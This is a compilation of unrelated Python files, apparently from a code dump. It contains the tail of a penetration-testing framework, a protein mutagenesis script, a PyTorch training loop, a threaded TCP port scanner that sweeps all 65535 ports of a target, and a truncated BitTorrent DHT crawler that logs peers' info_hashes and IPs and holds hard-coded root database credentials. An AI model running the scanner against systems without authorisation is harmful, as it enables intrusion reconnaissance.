            self.display.printModuleList(modules_dict)
            sys.exit()
        self.additionalInfo()
        self.msfCheck()
        # parse inputs (locals renamed from `input`/`file` to avoid
        # shadowing builtins)
        for input_type in self.inputs.keys():
            for inputmodule in self.inputModules.keys():
                _instance = self.inputModules[inputmodule]
                if _instance.getType() == input_type:
                    for infile in self.inputs[input_type]:
                        self.display.verbose("Loading [%s] with [%s]" % (infile, inputmodule))
                        _instance.go(infile)
        # populate any initial events
        self.populateInitEvents()
        # begin menu loop
        self.threadcount_thread = Thread(target=EventHandler.print_thread_count, args=(self.display,))
        self.threadcount_thread.start()
        while self.isRunning:
            self.displayMenu()
        kb.save(self.kbSaveFile)
        # generate reports
        self.display.output("Generating Reports")
        for reportmodule in self.reportModules.keys():
            _instance = self.reportModules[reportmodule]
            _instance.process()
        self.display.output()
        self.display.output("Good Bye!")
        self.cleanup()
|
mutate_pdb.py | from pmx import Model
from pmx.rotamer import load_bbdep
import argparse
import os
from helper import map_atom_string
from pmx.library import _aacids_dic
from pmx.rotamer import get_rotamers, select_best_rotamer
from os.path import basename
from multiprocessing import Process
# Argument parsers
def parse_args():
    """Collect the command-line options for saturated mutagenesis.

    Returns a 6-tuple: (input pdb path, positions, keep-hydrogens flag,
    two-mutations flag, output folder name, consecutive-rounds flag).
    """
    parser = argparse.ArgumentParser(
        description="Performs saturated mutagenesis given a PDB file")
    # main required arguments
    parser.add_argument("-i", "--input", required=True,
                        help="Include PDB file's path")
    parser.add_argument("-p", "--position", required=True, nargs="+",
                        help="Include one or more chain IDs and positions -> Chain ID:position")
    parser.add_argument("-m", "--multiple", action="store_true", required=False,
                        help="if you want to mutate 2 residue in the same pdb")
    parser.add_argument("-hy", "--hydrogen", action="store_false", required=False,
                        help="leave it to default")
    parser.add_argument("-pd", "--pdb_dir", default="pdb_files", required=False,
                        help="The name for the mutated pdb folder")
    parser.add_argument("-co", "--consecutive", action="store_true", required=False,
                        help="Consecutively mutate the PDB file for several rounds")
    parsed = parser.parse_args()
    return (parsed.input, parsed.position, parsed.hydrogen,
            parsed.multiple, parsed.pdb_dir, parsed.consecutive)
class Mutagenesis:
    """
    To perform point mutations on PDB files via pmx rotamer libraries
    """

    def __init__(self, model, position, folder="pdb_files", consec=False):
        """
        Initialize the Mutagenesis object

        Parameters
        ___________
        model: str
            path to the PDB file
        position: str
            chain ID:position of the residue, for example A:132
        folder: str
            The folder where the pdbs are written
        consec: bool
            If this is the second round of mutation
        """
        self.model = Model(model)
        self.input = model
        self.coords = position
        self.rotamers = load_bbdep()
        # the 20 canonical residues, 3-letter codes
        self.residues = ['ALA', 'CYS', 'GLU', 'ASP', 'GLY', 'PHE', 'ILE', 'HIS', 'LYS', 'MET', 'LEU', 'ASN', 'GLN',
                         'PRO', 'SER', 'ARG', 'THR', 'TRP', 'VAL', 'TYR']
        self.final_pdbs = []
        self.chain = None
        self.position = None
        # 3-letter -> 1-letter amino-acid lookup
        self._invert_aa = {v: k for k, v in _aacids_dic.items()}
        self.folder = folder
        self.chain_id = None
        self.consec = consec

    def mutate(self, residue, new_aa, bbdep, hydrogens=True):
        """
        Mutate the wild type residue to a new residue

        Parameters
        ___________
        residue: pmx object
            The residue has to be a pmx object
        new_aa: str
            A 3 letter or 1 letter code to represent the new residue
        bbdep:
            A database that can be interpreted by pmx
        hydrogens: bool, optional
            A boolean, leave it to True because False cause problems with cysteine
        """
        if len(new_aa) == 1:
            new_aa = _aacids_dic[new_aa]
        # backbone dihedrals select the rotamer ensemble
        phi = residue.get_phi()
        psi = residue.get_psi()
        rotamers = get_rotamers(bbdep, new_aa, phi, psi, residue=residue, full=True, hydrogens=hydrogens)
        new_r = select_best_rotamer(self.model, rotamers)
        self.model.replace_residue(residue, new_r)

    def _check_coords(self):
        """
        map the user coordinates with pmx coordinates
        """
        if not os.path.exists(self.folder):
            os.makedirs(self.folder)
        original = "{}/original.pdb".format(self.folder)
        if not os.path.exists(original):
            self.model.write(original)
            self.final_pdbs.append(original)
        if self.consec and original in self.final_pdbs:
            # BUGFIX: previously removed the unformatted literal
            # "{}/original.pdb", which was never in the list and always
            # raised ValueError in consecutive rounds; the membership guard
            # also covers the case where original.pdb already existed
            self.final_pdbs.remove(original)
        after = map_atom_string(self.coords, self.input, original)
        self.chain_id = after.split(":")[0]
        self.position = int(after.split(":")[1]) - 1  # pmx residues are 0-indexed
        for chain_ in self.model.chains:
            if chain_.id == self.chain_id:
                self.chain = chain_

    def saturated_mutagenesis(self, hydrogens=True):
        """
        Generate all the other 19 mutations

        Parameters
        ___________
        hydrogens: bool, optional
            Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS

        Returns
        _______
        final_pdbs: list[path]
            A list of the new files
        """
        self._check_coords()
        aa_init_resname = self.chain.residues[self.position].resname
        aa_name = self._invert_aa[aa_init_resname]
        for new_aa in self.residues:
            if new_aa != aa_init_resname:
                self.mutate(self.chain.residues[self.position], new_aa, self.rotamers, hydrogens=hydrogens)
                # writing into a pdb
                if self.consec:
                    # BUGFIX: strip the ".pdb" extension (was replace("pdb", ""),
                    # which left a trailing dot and hit "pdb" anywhere in the name)
                    name = basename(self.input).replace(".pdb", "")
                    output = "{}_{}{}{}.pdb".format(name, aa_name, self.position + 1, self._invert_aa[new_aa])
                else:
                    output = "{}{}{}.pdb".format(aa_name, self.position + 1, self._invert_aa[new_aa])
                self.model.write("{}/{}".format(self.folder, output))
                self.final_pdbs.append("{}/{}".format(self.folder, output))
        return self.final_pdbs

    def single_mutagenesis(self, new_aa, hydrogens=True):
        """
        Create single mutations

        Parameters
        ___________
        new_aa: str
            The aa to mutate to, in 3 letter code or 1 letter code
        hydrogens: bool, optional
            Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS

        Returns
        ______
        file_: str
            The name of the new pdb file
        """
        self._check_coords()
        aa_init_resname = self.chain.residues[self.position].resname
        aa_name = self._invert_aa[aa_init_resname]
        self.mutate(self.chain.residues[self.position], new_aa, self.rotamers, hydrogens=hydrogens)
        # writing into a pdb
        if len(new_aa) == 1:
            new = new_aa
        elif self._invert_aa.get(new_aa):
            new = self._invert_aa[new_aa]
        else:
            raise Exception("Aminoacid not recognized")
        if self.consec:
            # BUGFIX: strip the ".pdb" extension (was replace("pdb", ""))
            name = basename(self.input).replace(".pdb", "")
            output = "{}_{}{}{}.pdb".format(name, aa_name, self.position + 1, new)
        else:
            output = "{}{}{}.pdb".format(aa_name, self.position + 1, new)
        file_ = "{}/{}".format(self.folder, output)
        self.model.write(file_)
        self.insert_atomtype(file_)
        return file_

    def insert_atomtype(self, prep_pdb):
        """
        modifies the pmx PDB files to include the atom type

        Parameters
        ___________
        prep_pdb: path
            PDB files to modify
        """
        # read in user input
        with open(self.input, "r") as initial:
            initial_lines = initial.readlines()
        # read in preprocessed input
        with open(prep_pdb, "r") as prep:
            prep_lines = prep.readlines()
        for ind, line in enumerate(prep_lines):
            if (line.startswith("HETATM") or line.startswith("ATOM")) and (
                    line[21].strip() != self.chain_id.strip() or line[
                    22:26].strip() != str(self.position + 1)):
                # unmutated atom: recover the atom-type columns from the
                # original file by matching coordinates
                coords = line[30:54].split()
                for linex in initial_lines:
                    if linex[30:54].split() == coords:
                        prep_lines[ind] = line.strip("\n") + linex[66:81]
                        break
            elif (line.startswith("HETATM") or line.startswith("ATOM")) and line[
                    21].strip() == self.chain_id.strip() and line[
                    22:26].strip() == str(self.position + 1):
                # mutated residue: derive the element symbol from the atom name
                atom_name = line[12:16].strip()
                if atom_name[0].isalpha():
                    atom_type = " {} \n".format(atom_name[0])
                else:
                    atom_type = " {} \n".format(atom_name[1])
                prep_lines[ind] = line.strip("\n") + atom_type
        # rewrites the files now with the atom type
        with open(prep_pdb, "w") as prep:
            prep.writelines(prep_lines)

    def accelerated_insert(self, file_list=None):
        """
        Parallelizes the insert_atomtype function

        Parameters
        ___________
        file_list: list[path]
            optional if you want to include another list
        """
        pros = []
        if file_list:
            self.final_pdbs = file_list
        # one worker process per file; each rewrites its own pdb independently
        for prep_pdb in self.final_pdbs:
            p = Process(target=self.insert_atomtype, args=(prep_pdb,))
            p.start()
            pros.append(p)
        for p in pros:
            p.join()
def generate_mutations(input_, position, hydrogens=True, multiple=False, folder="pdb_files", consec=False):
    """
    To generate up to 2 mutations per pdb

    Parameters
    ___________
    input_: str
        Input pdb to be used to generate the mutations
    position: list[str]
        [chain ID:position] of the residue, for example [A:139,..]
    hydrogens: bool, optional
        Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS
    multiple: bool, optional
        Specify if to mutate 2 positions at the same pdb
    folder: str, optional
        The name of the folder where the new PDb files will be stored
    consec: bool, optional
        Consecutively mutate the PDB file for several rounds

    Returns
    ________
    pdbs: list[paths]
        The list of all generated pdbs' path
    """
    pdbs = []
    final_pdbs = []
    # Perform single saturated mutations
    for mutation in position:
        run = Mutagenesis(input_, mutation, folder, consec)
        final_pdbs = run.saturated_mutagenesis(hydrogens=hydrogens)
        pdbs.extend(final_pdbs)
        run.accelerated_insert()
    # Mutate in a second position for each of the single mutations
    # NOTE(review): final_pdbs here holds only the LAST position's outputs;
    # confirm whether the first round's files were intended instead.
    if multiple and len(position) == 2:
        for files in final_pdbs:
            name = basename(files).replace(".pdb", "")
            # BUGFIX: name already has ".pdb" stripped, so it could never
            # equal "original.pdb"; compare against "original" so the
            # unmutated structure is actually skipped
            if name != "original":
                run_ = Mutagenesis(files, position[1], folder, consec)
                final_pdbs_2 = run_.saturated_mutagenesis(hydrogens=hydrogens)
                pdbs.extend(final_pdbs_2)
                run_.accelerated_insert()
    return pdbs
def main():
    """Command-line entry point: parse the arguments and build the mutant pdbs."""
    input_, position, hydrogen, multiple, folder, consec = parse_args()
    return generate_mutations(input_, position, hydrogen, multiple, folder, consec)
if __name__ == "__main__":
    # Run this if this file is executed from the command line, but not if it is imported as an API
    all_pdbs = main()
|
train.py | #!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
from tensorboardX import SummaryWriter
# Single global TensorBoard writer; train() logs training/validation loss to it.
writer = SummaryWriter('tensorboard/1_continue')
# Let cuDNN auto-tune convolution algorithms (fast for fixed input shapes).
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
    """Build and evaluate the command-line interface for the training script.

    Returns:
        argparse.Namespace with cfg_file, start_iter, workers, initialize,
        distributed, world_size, rank, dist_url and dist_backend attributes.
    """
    cli = argparse.ArgumentParser(description="Training Script")
    cli.add_argument("cfg_file", help="config file", type=str)
    cli.add_argument("--iter", dest="start_iter",
                     help="train at iteration i",
                     default=0, type=int)
    cli.add_argument("--workers", default=1, type=int)
    cli.add_argument("--initialize", action="store_true")

    cli.add_argument("--distributed", action="store_true")
    cli.add_argument("--world-size", default=-1, type=int,
                     help="number of nodes of distributed training")
    cli.add_argument("--rank", default=0, type=int,
                     help="node rank for distributed training")
    cli.add_argument("--dist-url", default=None, type=str,
                     help="url used to set up distributed training")
    cli.add_argument("--dist-backend", default="nccl", type=str)
    return cli.parse_args()
def prefetch_data(system_config, db, queue, sample_data, data_aug):
    """Worker-process loop: endlessly sample batches from `db` onto `queue`.

    Seeds numpy per-process (so each worker draws a different stream) and
    never returns; any sampling error is printed and re-raised to kill the
    worker.
    """
    print("start prefetching data...")
    # distinct seed per worker process
    np.random.seed(os.getpid())
    cursor = 0
    while True:
        try:
            batch, cursor = sample_data(system_config, db, cursor, data_aug=data_aug)
            queue.put(batch)
        except Exception:
            traceback.print_exc()
            raise
def _pin_memory(ts):
    """Copy a tensor — or a list of tensors — into pinned (page-locked) host memory.

    :param ts: a torch tensor, or a list of torch tensors
    :return: the pinned tensor, or a list of pinned tensors
    """
    # isinstance (not `type(...) is list`) so list subclasses are handled too
    if isinstance(ts, list):
        return [t.pin_memory() for t in ts]
    return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
    """Thread loop: move batches from `data_queue` into pinned host memory.

    Runs until `sema` becomes acquirable (released by the main thread);
    note the semaphore is only checked after each batch is forwarded.
    """
    while True:
        batch = data_queue.get()
        batch["xs"] = list(map(_pin_memory, batch["xs"]))
        batch["ys"] = list(map(_pin_memory, batch["ys"]))
        pinned_data_queue.put(batch)
        if sema.acquire(blocking=False):
            return
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
    """Spawn one daemon prefetching process per database and return them."""
    tasks = []
    for db in dbs:
        proc = Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug))
        proc.daemon = True
        proc.start()
        tasks.append(proc)
    return tasks
def terminate_tasks(tasks):
    """Forcefully terminate every worker process in `tasks`."""
    for proc in tasks:
        proc.terminate()
def train(training_dbs, validation_db, system_config, model, args):
    """Main training loop.

    Spawns prefetching processes and memory-pinning threads, then runs the
    optimisation loop with periodic validation, snapshotting and learning
    rate decay.

    :param training_dbs: list of dataset handles, one per prefetch worker
    :param validation_db: dataset handle used for validation
    :param system_config: SystemConfig carrying the hyper-parameters
    :param model: network module to train
    :param args: parsed command-line namespace (gpu, rank, start_iter, ...)
    """
    global previous  # best validation loss so far (initialised in __main__)

    # reading arguments from command
    start_iter  = args.start_iter
    distributed = args.distributed
    initialize  = args.initialize
    gpu         = args.gpu
    rank        = args.rank

    # reading arguments from json file
    # (batch_size / world_size from the config are not used in this function)
    learning_rate    = system_config.learning_rate
    max_iteration    = system_config.max_iter
    pretrained_model = system_config.pretrain
    snapshot         = system_config.snapshot
    val_iter         = system_config.val_iter
    display          = system_config.display
    decay_rate       = system_config.decay_rate
    stepsize         = system_config.stepsize

    print("Process {}: building model...".format(rank))
    nnet = NetworkFactory(system_config, model, distributed=distributed, gpu=gpu)
    if initialize:
        # --initialize only writes the initial weights and stops
        nnet.save_params(0)
        exit(0)

    # queues storing data for training
    training_queue   = Queue(system_config.prefetch_size)
    validation_queue = Queue(5)

    # queues storing pinned data for training
    pinned_training_queue   = queue.Queue(system_config.prefetch_size)
    pinned_validation_queue = queue.Queue(5)

    # allocating resources for parallel reading
    training_tasks = init_parallel_jobs(system_config, training_dbs, training_queue, data_sampling_func, True)
    # bug fix: validation_tasks was only bound when val_iter was truthy, but
    # it was unconditionally passed to terminate_tasks() at the end (NameError)
    validation_tasks = None
    if val_iter:
        validation_tasks = init_parallel_jobs(system_config, [validation_db], validation_queue, data_sampling_func, False)

    # semaphores used to tell the pinning threads to exit
    training_pin_semaphore   = threading.Semaphore()
    validation_pin_semaphore = threading.Semaphore()
    training_pin_semaphore.acquire()
    validation_pin_semaphore.acquire()

    training_pin_args   = (training_queue, pinned_training_queue, training_pin_semaphore)
    training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
    training_pin_thread.daemon = True
    training_pin_thread.start()

    validation_pin_args   = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
    validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
    validation_pin_thread.daemon = True
    validation_pin_thread.start()

    if pretrained_model is not None:
        if not os.path.exists(pretrained_model):
            raise ValueError("pretrained model does not exist")
        print("Process {}: loading from pretrained model".format(rank))
        nnet.load_pretrained_params(pretrained_model)

    if start_iter:
        # resume: reload the checkpoint and rewind the lr schedule
        nnet.load_params(start_iter)
        learning_rate /= (decay_rate ** (start_iter // stepsize))
        nnet.set_lr(learning_rate)
        print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
    else:
        nnet.set_lr(learning_rate)

    if rank == 0:
        print("training start...")
    nnet.cuda()
    nnet.train_mode()
    with stdout_to_tqdm() as save_stdout:
        for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
            training = pinned_training_queue.get(block=True)
            training_loss = nnet.train(**training)

            if display and iteration % display == 0:
                print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
                writer.add_scalar('myscalar_train', training_loss.item(), iteration)
            del training_loss

            if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
                nnet.eval_mode()
                validation = pinned_validation_queue.get(block=True)
                validation_loss = nnet.validate(**validation)
                # keep a separate "best" checkpoint for the lowest validation loss
                if validation_loss.item() < previous:
                    previous = validation_loss.item()
                    nnet.save_params_best()
                print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
                writer.add_scalar('myscalar_val', validation_loss.item(), iteration)
                nnet.train_mode()

            if iteration % snapshot == 0 and rank == 0:
                nnet.save_params(iteration)

            if iteration % stepsize == 0:
                learning_rate /= decay_rate
                nnet.set_lr(learning_rate)

    # sending signal to kill the pinning threads
    training_pin_semaphore.release()
    validation_pin_semaphore.release()

    # terminating data fetching processes
    terminate_tasks(training_tasks)
    if validation_tasks is not None:
        terminate_tasks(validation_tasks)
def main(gpu, ngpus_per_node, args):
    """Per-process entry point: load config, datasets and model, then train.

    :param gpu: local GPU index (None when not distributed)
    :param ngpus_per_node: number of GPUs on this node
    :param args: parsed command-line namespace
    """
    args.gpu = gpu
    if args.distributed:
        # global rank = node rank * gpus-per-node + local gpu index
        args.rank = args.rank * ngpus_per_node + gpu
        dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
                                world_size=args.world_size, rank=args.rank)

    rank = args.rank

    cfg_file = os.path.join("./configs", args.cfg_file + ".json")
    with open(cfg_file, "r") as f:
        config = json.load(f)

    config["system"]["snapshot_name"] = args.cfg_file
    system_config = SystemConfig().update_config(config["system"])

    # the model module is named after the config file (core.models.<cfg>)
    model_file = "core.models.{}".format(args.cfg_file)
    model_file = importlib.import_module(model_file)
    model = model_file.model()

    train_split = system_config.train_split
    val_split = system_config.val_split

    print("Process {}: loading all datasets...".format(rank))
    dataset = system_config.dataset
    workers = args.workers
    print("Process {}: using {} workers".format(rank, workers))
    # one independent training db handle per prefetch worker
    training_dbs = [datasets[dataset](config["db"], split=train_split, sys_config=system_config) for _ in range(workers)]
    validation_db = datasets[dataset](config["db"], split=val_split, sys_config=system_config)

    if rank == 0:
        print("system config...")
        pprint.pprint(system_config.full)

        print("db config...")
        pprint.pprint(training_dbs[0].configs)

        print("len of db: {}".format(len(training_dbs[0].db_inds)))
        print("distributed: {}".format(args.distributed))

    train(training_dbs, validation_db, system_config, model, args)
if __name__ == "__main__":
    args = parse_args()

    # best validation loss so far; train() reads and updates this global
    previous = 100000000000000

    distributed = args.distributed
    world_size = args.world_size

    # NOTE(review): the message says "greater than 0" but the check only
    # rejects negative values (the CLI default is -1) — confirm intended bound.
    if distributed and world_size < 0:
        raise ValueError("world size must be greater than 0 in distributed training")

    ngpus_per_node = torch.cuda.device_count()
    if distributed:
        # one process per GPU: scale the node count up to a global world size
        args.world_size = ngpus_per_node * args.world_size
        mp.spawn(main, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
    else:
        main(None, ngpus_per_node, args)
|
portscan.py | import socket
from colorama import Fore as fore
from threading import Thread, Lock
from queue import Queue
import os
def init():
    """Announce that the port-scanner module has been loaded."""
    print("portscanner_module [OK]")
def execute(host):
    """Scan every TCP port (1-65535) on `host` with a pool of threads.

    Prints progress with colorama and returns the list of ports that
    accepted a TCP connection.

    :param host: hostname or IP address to scan
    :return: list[int] of open ports
    """
    N_THREADS = 400
    global q
    q = Queue()
    print_lock = Lock()
    global open_ports
    open_ports = []

    def portscan(port):
        # Try a plain TCP connect; success means the port is open.
        # socket() is created outside the try so `s` always exists in finally
        # (the old code could NameError on s.close() if socket() itself failed).
        s = socket.socket()
        try:
            s.connect((host, port))
        except OSError:
            # connection refused / timed out / unreachable -> closed port
            with print_lock:
                print(f"{fore.LIGHTBLACK_EX}{host:15} : {port:5} {fore.RESET}", end='\r')
        else:
            with print_lock:
                print(f"{fore.GREEN}{host:15} : {port:5} is open {fore.RESET}")
            open_ports.append(port)
        finally:
            s.close()

    def scan_thread():
        # Daemon worker: pull ports off the queue until the process exits.
        while True:
            worker = q.get()
            portscan(worker)
            q.task_done()

    def main(host, ports):
        for _ in range(N_THREADS):
            t = Thread(target=scan_thread)
            t.daemon = True
            t.start()
        for worker in ports:
            q.put(worker)
        # bug fix: was `q.join` (attribute access, never called), so the scan
        # returned before the workers had finished probing the ports
        q.join()

    print(f"{fore.RED}[+]Target: {host}")
    start = 1
    end = 65535
    # range() excludes its stop value; +1 so port 65535 is actually scanned
    ports = [p for p in range(start, end + 1)]
    main(host, ports)
    print("--------------------------------")
    print("--------------------------------")
    print("[Wait......]")
    return open_ports
|
startCrawler.py | #!/usr/bin/env python
# encoding: utf-8
"""
author:haoning
create time:2015.8.1
"""
import hashlib
import os
import time
import datetime
import traceback
import sys
import random
import json
import socket
import threading
from hashlib import sha1 # 进行hash加密
from random import randint
from struct import unpack
from socket import inet_ntoa
from threading import Timer, Thread
from time import sleep
from collections import deque
from Queue import Queue
import MySQLdb as mdb # 数据库连接器
import metautils
import downloadTorrent
from bencode import bencode, bdecode
import pygeoip
# MySQL connection settings for the torrent metadata store
DB_HOST = '127.0.0.1'
DB_USER = 'root'
DB_PASS = 'root'
# Well-known DHT routers used to bootstrap the node table
BOOTSTRAP_NODES = (
    ("67.215.246.10", 6881),
    ("82.221.103.244", 6881),
    ("23.21.224.150", 6881)
)
RATE = 1  # query throttling rate (adjusted at runtime by DHTServer)
TID_LENGTH = 2
RE_JOIN_DHT_INTERVAL = 3
TOKEN_LENGTH = 2
INFO_HASH_LEN = 500000  # 500k pending hashes keeps memory bounded
CACHE_LEN = 100  # database write-back cache size
WAIT_DOWNLOAD = 80
# GeoIP database used to filter announces by country
geoip = pygeoip.GeoIP('GeoIP.dat')
def is_ip_allowed(ip):
    """Return True when `ip` geolocates to one of the crawled countries."""
    return geoip.country_code_by_addr(ip) in ('CN', 'TW', 'JP', 'HK', 'KR')
def entropy(length):
    """Return `length` random bytes as a str (Python 2)."""
    random_chars = [chr(randint(0, 255)) for _ in xrange(length)]
    return "".join(random_chars)
def random_id():
    """Return a random 20-byte DHT node id (SHA-1 digest of random input)."""
    return sha1(entropy(20)).digest()
def decode_nodes(nodes):
    """Decode a compact DHT node list into [(nid, ip, port), ...].

    Each entry is 26 bytes: 20-byte node id, 4-byte IPv4, 2-byte big-endian
    port. Returns an empty list when the buffer length is not a multiple
    of 26.
    """
    if len(nodes) % 26 != 0:
        return []
    decoded = []
    for offset in range(0, len(nodes), 26):
        nid = nodes[offset:offset + 20]
        ip = inet_ntoa(nodes[offset + 20:offset + 24])
        port = unpack("!H", nodes[offset + 24:offset + 26])[0]
        decoded.append((nid, ip, port))
    return decoded
def timer(t, f):
    """Invoke `f` once, after `t` seconds, on a background Timer thread."""
    delayed = Timer(t, f)
    delayed.start()
def get_neighbor(target, nid, end=10):
    """Return an id sharing its first `end` bytes with `target`, rest from `nid`."""
    prefix = target[:end]
    suffix = nid[end:]
    return prefix + suffix
class KNode(object):
    """A remote DHT node: 20-byte node id plus its UDP endpoint."""

    def __init__(self, nid, ip, port):
        # store the id and endpoint verbatim
        self.nid, self.ip, self.port = nid, ip, port
class DHTClient(Thread):
    """Active half of the crawler: walks the DHT by sending find_node queries."""

    def __init__(self, max_node_qsize):
        Thread.__init__(self)
        self.setDaemon(True)
        self.max_node_qsize = max_node_qsize
        self.nid = random_id()
        # bounded FIFO of discovered nodes; old entries fall off automatically
        self.nodes = deque(maxlen=max_node_qsize)

    def send_krpc(self, msg, address):
        """Bencode and send a KRPC message; network errors are ignored."""
        try:
            self.ufd.sendto(bencode(msg), address)
        except Exception:
            pass

    def send_find_node(self, address, nid=None):
        """Send a find_node query, posing as a neighbour of `nid` when given."""
        nid = get_neighbor(nid, self.nid) if nid else self.nid
        tid = entropy(TID_LENGTH)
        msg = {
            "t": tid,
            "y": "q",
            "q": "find_node",
            "a": {
                "id": nid,
                "target": random_id()
            }
        }
        self.send_krpc(msg, address)

    def join_DHT(self):
        """Contact the bootstrap routers to (re)enter the DHT."""
        for address in BOOTSTRAP_NODES:
            self.send_find_node(address)

    def re_join_DHT(self):
        """Re-bootstrap whenever the node table runs dry; reschedules itself."""
        if len(self.nodes) == 0:
            self.join_DHT()
        timer(RE_JOIN_DHT_INTERVAL, self.re_join_DHT)

    def auto_send_find_node(self):
        """Main crawl loop: drain the node queue at a steady, throttled rate."""
        wait = 1.0 / self.max_node_qsize
        while True:
            try:
                node = self.nodes.popleft()
                self.send_find_node((node.ip, node.port), node.nid)
            except IndexError:
                pass
            try:
                sleep(wait)
            except KeyboardInterrupt:
                os._exit(0)

    def process_find_node_response(self, msg, address):
        """Harvest nodes from a find_node reply into the crawl queue."""
        nodes = decode_nodes(msg["r"]["nodes"])
        for node in nodes:
            (nid, ip, port) = node
            if len(nid) != 20:
                continue
            # NOTE(review): self.bind_ip is assigned by a subclass —
            # DHTClient alone does not define it; confirm usage.
            if ip == self.bind_ip:
                continue
            n = KNode(nid, ip, port)
            self.nodes.append(n)
class DHTServer(DHTClient):  # harvests info_hashes from incoming queries
    """Passive half of the crawler: answers KRPC queries and logs info_hashes."""

    def __init__(self, master, bind_ip, bind_port, max_node_qsize):
        DHTClient.__init__(self, max_node_qsize)

        self.master = master
        self.bind_ip = bind_ip
        self.bind_port = bind_port
        self.speed = 0
        # dispatch table for incoming KRPC query types
        self.process_request_actions = {
            "get_peers": self.on_get_peers_request,
            "announce_peer": self.on_announce_peer_request,
        }

        self.ufd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        self.ufd.bind((self.bind_ip, self.bind_port))

        timer(RE_JOIN_DHT_INTERVAL, self.re_join_DHT)

    def run(self):
        """Receive loop: bdecode each datagram and dispatch it; errors ignored."""
        self.re_join_DHT()
        while True:
            try:
                (data, address) = self.ufd.recvfrom(65536)
                msg = bdecode(data)
                self.on_message(msg, address)
            except Exception:
                pass

    def on_message(self, msg, address):
        """Route a KRPC message, throttling query handling via the global RATE."""
        global RATE  # reassigned below, hence the global declaration
        try:
            if msg["y"] == "r":
                if "nodes" in msg["r"]:
                    self.process_find_node_response(msg, address)  # node discovery
            elif msg["y"] == "q":
                try:
                    self.speed += 1
                    # every 10000 queries pick a new throttle value: 1, 1 or 10
                    if self.speed % 10000 == 0:
                        RATE = random.randint(1, 3)
                        if RATE == 2:
                            RATE = 1
                        if RATE == 3:
                            RATE = 10
                    if self.speed > 100000:
                        self.speed = 0
                    # process only every RATE-th query to limit CPU load;
                    # this is where info_hashes are harvested from peers
                    if self.speed % RATE == 0:
                        self.process_request_actions[msg["q"]](msg, address)
                except KeyError:
                    self.play_dead(msg, address)
        except KeyError:
            pass

    def on_get_peers_request(self, msg, address):
        """Reply to get_peers with an empty node list and log the info_hash."""
        try:
            infohash = msg["a"]["info_hash"]
            tid = msg["t"]
            nid = msg["a"]["id"]
            token = infohash[:TOKEN_LENGTH]
            msg = {
                "t": tid,
                "y": "r",
                "r": {
                    "id": get_neighbor(infohash, self.nid),
                    "nodes": "",
                    "token": token
                }
            }
            self.master.log(infohash, address)
            self.send_krpc(msg, address)
        except KeyError:
            pass

    def on_announce_peer_request(self, msg, address):
        """Validate the token and log a confirmed (info_hash, peer) pair."""
        try:
            infohash = msg["a"]["info_hash"]
            token = msg["a"]["token"]
            nid = msg["a"]["id"]
            tid = msg["t"]
            if infohash[:TOKEN_LENGTH] == token:
                # implied_port != 0 means "use the UDP source port"
                if msg["a"].get("implied_port", 0) != 0:
                    port = address[1]
                else:
                    port = msg["a"]["port"]
                self.master.log_announce(infohash, (address[0], port))
        except Exception:
            pass
        finally:
            self.ok(msg, address)

    def play_dead(self, msg, address):
        """Answer an unsupported query with a generic server error."""
        try:
            tid = msg["t"]
            msg = {
                "t": tid,
                "y": "e",
                "e": [202, "Server Error"]
            }
            self.send_krpc(msg, address)
        except KeyError:
            pass

    def ok(self, msg, address):
        """Send a minimal affirmative reply to `msg`."""
        try:
            tid = msg["t"]
            nid = msg["a"]["id"]
            msg = {
                "t": tid,
                "y": "r",
                "r": {
                    "id": get_neighbor(nid, self.nid)
                }
            }
            self.send_krpc(msg, address)
        except KeyError:
            pass
class Master(Thread):  # resolves info_hashes into torrent metadata
    """Worker pool manager: dedupes info_hashes, downloads torrent metadata
    and persists the parsed results into MySQL."""

    def __init__(self):
        Thread.__init__(self)
        self.setDaemon(True)
        self.queue = Queue()
        self.cache = Queue()
        self.count = 0
        self.mutex = threading.RLock()  # re-entrant lock, so a thread may re-acquire it
        self.waitDownload = Queue()
        self.metadata_queue = Queue()
        self.dbconn = mdb.connect(DB_HOST, DB_USER, DB_PASS, 'oksousou', charset='utf8')
        self.dbconn.autocommit(False)
        self.dbcurr = self.dbconn.cursor()
        self.dbcurr.execute('SET NAMES utf8')
        self.visited = set()

    def lock(self):  # acquire the shared mutex
        self.mutex.acquire()

    def unlock(self):  # release the shared mutex
        self.mutex.release()

    def work(self, item):
        """Worker loop: stage, download and persist metadata forever."""
        while True:
            self.prepare_download_metadata()
            self.lock()
            self.download_metadata()
            self.unlock()
            self.lock()
            self.got_torrent()
            self.unlock()

    def start_work(self, max):
        """Spawn `max` daemon worker threads running work()."""
        for item in xrange(max):
            t = threading.Thread(target=self.work, args=(item,))
            t.setDaemon(True)
            t.start()

    # announced torrents are the most likely to be retrievable
    def log_announce(self, binhash, address=None):
        if self.queue.qsize() < INFO_HASH_LEN:  # drop when backlogged; downstream cannot keep up
            if is_ip_allowed(address[0]):
                self.queue.put([address, binhash])  # got an info_hash

    def log(self, infohash, address=None):
        """Queue an info_hash seen in a get_peers query."""
        if self.queue.qsize() < INFO_HASH_LEN:  # drop when backlogged; downstream cannot keep up
